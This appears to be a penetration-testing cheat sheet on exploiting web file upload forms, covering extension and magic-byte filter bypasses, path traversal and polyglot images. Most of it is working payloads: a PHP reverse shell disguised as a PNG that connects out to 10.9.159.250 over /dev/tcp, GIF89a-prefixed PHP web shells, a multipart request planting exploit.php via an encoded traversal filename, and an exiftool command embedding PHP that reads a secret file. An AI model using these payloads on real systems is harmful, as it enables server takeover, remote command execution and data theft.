File upload
Upload forms that allow to upload files are interesting to investigate.
Steps to find vulnerable upload form
Find the webserver language
PHP, Python, etc
Check for filters on the form
Allowed to upload any file?
Only checks file extension?
Bypass filter
Change magic number of file using hexeditor https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5
Change file name and add file extension (example.jpg.php)
Examples
Bypass file extension filters:
Add pixel to reverse shell to make it look like a image:
echo -e $'\x89\x50\x4e\x47\x0d\x0a\x1a\n<?php echo system("bash -c 'bash -i >& /dev/tcp/10.9.159.250/443 0>&1'");' > shell.png.php2
GIF89a; header
GIF89a is a GIF file header. If uploaded content is being scanned, sometimes the check can be fooled by putting this header item at the top of shellcode:
GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>
Bypass upload filters
File upload and Path traversal
Sometimes the server is configured to prevent execution of user-supplied files. We can maybe bypass the location to upload somewhere else using path traversal:
-----------------------------37439413615083975161695220246
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"
Content-Type: application/octet-stream
<html>
<body>
<?php system($_GET['cmd']); ?>
</body>
</html>
Response:
The file avatars/../exploit.php has been uploaded.<p>
Now go to the upper directory of avatars, maybe something like /files and /files/exploit.php.
Bypass with Polyglot
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" test-412579532.png -o
polyglot.php
Last updated